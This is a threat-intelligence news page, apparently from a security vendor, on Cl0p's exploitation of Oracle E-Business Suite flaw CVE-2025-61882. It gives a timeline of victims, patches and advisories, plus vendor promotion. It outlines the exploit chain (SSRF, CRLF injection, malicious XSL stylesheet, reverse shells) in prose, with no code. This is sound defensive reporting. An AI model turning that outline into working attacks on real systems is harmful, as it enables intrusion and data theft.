Critical Remote Code Execution Vulnerability in Oracle E-Business Suite Exploited by Clop Ransomware
Oracle E-Business Suite (EBS) was found to contain a critical remote code execution (RCE) vulnerability, tracked as CVE-2025-61882, which has been actively exploited in the wild. The flaw resides in the Oracle Concurrent Processing component, specifically within the BI Publisher Integration, and carries a CVSS base score of 9.8 due to its unauthenticated and easily exploitable nature. Attackers can leverage this vulnerability to execute arbitrary code remotely without requiring valid credentials, posing a severe risk to organizations running affected EBS versions. Oracle confirmed that versions 12.2.3 through 12.2.14 are impacted by this vulnerability. The company released an emergency security update to address the issue, but customers must first apply the October 2023 Critical Patch Update before deploying the new fix. The vulnerability was exploited by the Clop ransomware group in a series of data theft attacks in August 2025, resulting in significant data exfiltration from multiple victims. Mandiant's CTO, Charles Carmakal, confirmed that Clop leveraged both this zero-day and other previously patched vulnerabilities in their campaign. Oracle's advisory included indicators of compromise that matched exploit details shared by threat actors on Telegram, highlighting the public availability of exploit information. The exploitation of this flaw underscores the importance of timely patch management, especially for business-critical applications like Oracle EBS. Oracle has urged all customers to prioritize the application of the latest patches to mitigate the risk of further exploitation. The incident demonstrates the increasing trend of ransomware groups targeting enterprise software vulnerabilities for large-scale data theft. Security researchers have emphasized the need for organizations to monitor for signs of compromise and to review their EBS deployments for unauthorized activity. The rapid release of a security alert and patch by Oracle reflects the urgency and severity of the threat posed by CVE-2025-61882. Organizations are advised to follow Oracle's remediation guidance closely and to remain vigilant for related threat activity. The incident has raised concerns about the security posture of widely used ERP platforms and the potential for future exploitation of similar vulnerabilities. The Clop attacks serve as a reminder that threat actors are adept at chaining multiple vulnerabilities to maximize impact. This event highlights the criticality of maintaining up-to-date security controls and monitoring for exploitation attempts targeting high-value enterprise systems.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
16 events from the most recent confirmed update back to the earliest known activity.
Envoy Air confirms Oracle E-Business Suite compromise
On October 17, 2025, regional airline Envoy Air confirmed it had been compromised through Oracle E-Business Suite. This added another publicly identified victim to the growing list of organizations affected by the campaign.
Oracle releases patch for related flaw CVE-2025-61884
By October 15, 2025, reporting indicated Oracle had also released a patch for a related vulnerability, CVE-2025-61884, in addition to CVE-2025-61882. The additional fix suggested defenders needed to address more than one issue connected to the Oracle EBS attack surface.
Cl0p lists Harvard and claims 1.3 TB of stolen data
By October 14, 2025, Cl0p had added Harvard University to its leak site and claimed to have stolen about 1.3 TB of data. This was one of the first named victims publicly associated with the Oracle EBS campaign.
Harvard discloses breach linked to Oracle EBS zero-day
On October 13, 2025, Harvard said it was investigating a breach tied to exploitation of the Oracle EBS zero-day and that a limited number of parties in a small administrative unit were affected. The university said it had applied Oracle's patch and had not found evidence of broader compromise in other systems.
Researchers publish malware and exploit-chain details from Oracle EBS attacks
Around October 10-13, 2025, researchers disclosed technical details of the campaign, including SSRF, CRLF injection, authentication bypass, XSL template injection, and Java-based payloads such as GOLDVEIN.JAVA and SAGE malware variants. The reporting also described web shells, in-memory backdoors, outbound callbacks, and post-exploitation tooling overlaps with FIN11 activity.
Mandiant and GTIG say dozens of organizations were impacted
By October 9-10, 2025, Google Threat Intelligence Group and Mandiant reported that dozens of organizations had been breached in the Oracle EBS campaign. Their findings said attackers used multiple vulnerabilities and compromised third-party email accounts to run large-scale extortion operations.
CrowdStrike ties Oracle EBS exploitation to Cl0p and dates attacks to Aug. 9
On October 7, 2025, reporting citing CrowdStrike said exploitation of CVE-2025-61882 was linked to Cl0p, also tracked as Graceful Spider, with attacks beginning on August 9, 2025. This was a key attribution and timeline refinement for the campaign.
Leaked exploit scripts for CVE-2025-61882 circulate publicly
On October 7, 2025, researchers reported that exploit scripts for CVE-2025-61882 were circulating on Telegram. Analysis showed the attack chain abused SSRF and malicious XSL content to achieve remote code execution and reverse-shell access on Oracle EBS servers.
CISA adds CVE-2025-61882 to the KEV catalog
By October 7, 2025, CVE-2025-61882 had been added to CISA's Known Exploited Vulnerabilities catalog. The listing formally recognized the flaw as actively exploited in the wild and increased pressure on defenders to remediate quickly.
Government agencies urge organizations to patch Oracle EBS
By October 6, 2025, government defenders including the FBI, the UK government, and the Canadian Centre for Cyber Security were warning organizations to patch Oracle EBS urgently. These advisories reflected concern over active exploitation and extortion activity tied to the flaw.
Public reporting links Cl0p extortion campaign to Oracle EBS zero-day
Beginning October 5-6, 2025, multiple outlets reported that the Cl0p extortion ecosystem was exploiting CVE-2025-61882 in Oracle EBS to steal data and pressure victims. Reports said executives were receiving extortion emails claiming Oracle EBS data had been stolen, with some demands reportedly reaching $50 million.
Oracle updates advisory with new exploitation findings and IOCs
Oracle updated its advisory on October 4, 2025 after uncovering additional potential exploitation during its investigation. The alert included indicators of compromise such as IP addresses, file hashes, and reverse-shell artifacts, and replaced earlier references to possible July CPU vulnerabilities with CVE-2025-61882.
Oracle issues security alert and emergency patch for CVE-2025-61882
On October 4, 2025, Oracle published a Security Alert Advisory and released an emergency fix for CVE-2025-61882, a critical unauthenticated remote code execution flaw in Oracle E-Business Suite BI Publisher integration. Oracle said the vulnerability was being actively exploited and provided mitigation guidance for affected EBS versions 12.2.3 through 12.2.14.
Campaign detected in late September
According to later reporting, the Oracle EBS compromise campaign was only detected in late September 2025 despite having begun weeks earlier. This marked the point when defenders and vendors began investigating the broader scope of the intrusions.
Active exploitation and data theft observed by early August
Security researchers later determined that exploitation of Oracle EBS, including CVE-2025-61882, was underway by early August 2025, with one widely cited start point of August 9. Attackers used the access to steal data from victim environments for later extortion.
Cl0p-linked Oracle EBS campaign begins as early as July 2025
Later reporting and incident analysis indicate the Oracle E-Business Suite intrusion campaign started as early as July 2025, with attackers using multiple exploit chains against internet-facing EBS systems. The activity was not publicly known at the time and was only recognized later during investigations.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
43 references tracked. Mallory keeps watching after this page renders.
Regional airline Envoy Air confirms Oracle E-Business Suite compromise
therecord.media
Open sourceOracle E-Business Suite Zero-Day (CVE-2025-61882) — Post-Incident Technical Brief
foresiet.com
Open sourceHarvard University Breached in Oracle Zero-Day Attack
darkreading.com
Open sourceHarvard University hit in Oracle EBS cyberattack, 1.3 TB of data leaked by Cl0p group
securityaffairs.com
Open sourceCVE-2025-61882: Frequently Asked Questions About Oracle E-Business Suite (EBS) Zero-Day and Associated Vulnerabilities
tenable.com
Open sourceCVE-2025-61882: Frequently Asked Questions About Oracle E-Business Suite (EBS) Zero-Day and Associated Vulnerabilities
securityboulevard.com
Open sourceOracle Security Alerts CVE-2025-61882
oracle.com
Open sourceOracle patches EBS zero-day exploited in Clop data theft attacks
bleepingcomputer.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Oracle E-Business Suite Zero-Day Exploited for Remote Code Execution and Data Theft
Oracle E-Business Suite (EBS) was found to contain a critical zero-day vulnerability, tracked as CVE-2025-61884 and CVE-2025-61882, which allowed unauthenticated remote code execution and was actively exploited by threat actors, including the Clop ransomware group. The vulnerability, present in EBS versions 12.2.3 through 12.2.14, enabled attackers to access sensitive resources without authentication by exploiting a pre-authentication Server-Side Request Forgery (SSRF) flaw. Oracle released an out-of-band security update to address the issue, but did so without publicly acknowledging that the flaw was being actively exploited or that a proof-of-concept exploit had been leaked by the ShinyHunters extortion group. Security researchers and customers confirmed that the patch addressed the SSRF vulnerability used in the attacks. The exploit chain was complex, involving an unauthenticated HTTP POST to a specific servlet, manipulation of return_url parameters to trigger SSRF, CRLF/header injection, HTTP connection reuse, and ultimately the delivery of a malicious XSL stylesheet. This XSLT payload, containing embedded Java code, was processed by the server, leading to arbitrary code execution and the potential for attackers to spawn reverse shells. The Clop ransomware group sent extortion emails to Oracle EBS customers, claiming to have stolen sensitive data by exploiting this flaw, and confirmed their involvement in the campaign. The attack campaign was detected by Mandiant and Google, who observed that multiple threat actors were leveraging the vulnerability for data theft and extortion. The exploit chain demonstrated the risk of chaining multiple weaknesses in enterprise software to achieve full remote code execution. Security vendors, such as Imperva, responded by confirming protection for their customers against this exploit. The incident highlighted Oracle's lack of transparency regarding active exploitation and the public availability of exploit code. The technical details of the exploit, including SSRF, CRLF injection, and XSLT-based code execution, underscored the sophistication of the attack. The vulnerability's exploitation in the wild emphasized the importance of rapid patching and monitoring for signs of compromise in Oracle EBS environments. The campaign also illustrated the ongoing threat posed by ransomware and extortion groups targeting critical business applications. Organizations using Oracle EBS were urged to apply the security update immediately and review their systems for indicators of compromise. The incident raised concerns about the security of widely used enterprise resource planning (ERP) platforms and the need for proactive vulnerability management.
Mar 21, 2026
Clop Ransomware Exploitation of Oracle E-Business Suite Zero-Day Vulnerability
Oracle disclosed a critical zero-day vulnerability, CVE-2025-61882, in its E-Business Suite that was actively exploited by the Clop ransomware group to conduct a widespread data theft and extortion campaign. The vulnerability, which affects Oracle E-Business Suite, was addressed in a security advisory released on a Saturday, with Oracle urging customers to apply the patch immediately to mitigate the risk of compromise. Federal cyber authorities and threat intelligence researchers expressed heightened concern following Oracle’s announcement, as the flaw had been exploited for at least eight weeks before some victims received extortion demands. The Clop group leveraged this zero-day, along with other vulnerabilities previously addressed in Oracle’s July security update, to gain unauthorized access to enterprise resource planning (ERP) systems. Once inside, the attackers exfiltrated sensitive data and subsequently targeted executives with spear-phishing emails containing ransom demands, threatening to leak or misuse the stolen information. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-61882 to its known exploited vulnerabilities catalog, confirming its use in active ransomware campaigns. Oracle’s Chief Security Officer, Rob Duhart, updated customers via a blog post, providing indicators of compromise and emphasizing the urgency of patching. The FBI’s Cyber Division described the situation as an emergency, highlighting the critical role Oracle E-Business Suite plays in both public and private sector organizations and the high incentive for attackers to weaponize the vulnerability quickly. Security briefings noted that organizations running Oracle E-Business Suite were specifically targeted, with attackers using sophisticated spear-phishing tactics to maximize the impact of their extortion efforts. The campaign’s discovery has amplified concerns about the security of widely used ERP platforms and the increasing sophistication of ransomware groups like Clop. The incident underscores the importance of timely patch management and the need for organizations to monitor for indicators of compromise associated with this vulnerability. The attack has prompted a rapid response from both Oracle and federal agencies, with advisories and threat intelligence updates being disseminated to help organizations defend against ongoing exploitation. The event has also reignited discussions about the risks posed by zero-day vulnerabilities in critical business applications and the necessity for coordinated industry response. As the situation develops, organizations are advised to remain vigilant, apply all relevant security updates, and review their incident response plans to address potential data theft and extortion scenarios. The Clop group’s exploitation of this zero-day highlights the evolving tactics of ransomware actors and the persistent threat they pose to enterprise environments.
Mar 21, 2026
Cl0p Ransomware Group Exploits Oracle E-Business Suite Zero-Day for Data Theft
Threat actors associated with the Cl0p ransomware group have exploited a critical zero-day vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882, to facilitate large-scale data theft attacks. The flaw, which carries a CVSS score of 9.8, allows unauthenticated attackers with network access via HTTP to compromise and take control of the Oracle Concurrent Processing component. According to Mandiant CTO Charles Carmakal, Cl0p exploited multiple vulnerabilities in Oracle EBS, including those patched in Oracle's July 2025 update and the newly addressed CVE-2025-61882, to steal significant amounts of data from several organizations in August 2025. The attacks highlight the persistent threat posed by ransomware groups leveraging both known and unknown vulnerabilities to breach enterprise systems. Oracle responded by releasing a patch for CVE-2025-61882, but the incident underscores the importance of timely patch management, as some exploited vulnerabilities had been addressed in previous updates. The exploitation campaign demonstrates Cl0p's technical sophistication and ability to chain multiple vulnerabilities for maximum impact. Victims of these attacks faced the risk of sensitive data exfiltration, with the potential for extortion or public leaks. The incident has raised concerns about the security of widely deployed enterprise resource planning (ERP) platforms, especially those exposed to the internet. Security experts recommend organizations using Oracle EBS urgently apply all relevant patches and review their exposure to internet-facing components. The attacks also serve as a warning about the increasing trend of ransomware groups targeting business-critical applications rather than just endpoints. The campaign has prompted renewed calls for organizations to enhance monitoring, implement network segmentation, and restrict unnecessary external access to ERP systems. The Cl0p group's activity in this case is part of a broader pattern of ransomware operators exploiting high-impact vulnerabilities for data theft and extortion. The incident has been widely discussed in the cybersecurity community as a case study in the risks of delayed patching and the evolving tactics of financially motivated threat actors. Organizations are urged to coordinate with their security vendors and incident response teams to assess potential exposure and strengthen their defenses against similar attacks. The Oracle EBS zero-day exploitation by Cl0p is a stark reminder of the need for continuous vulnerability management and proactive threat intelligence sharing across the industry.
Mar 21, 2026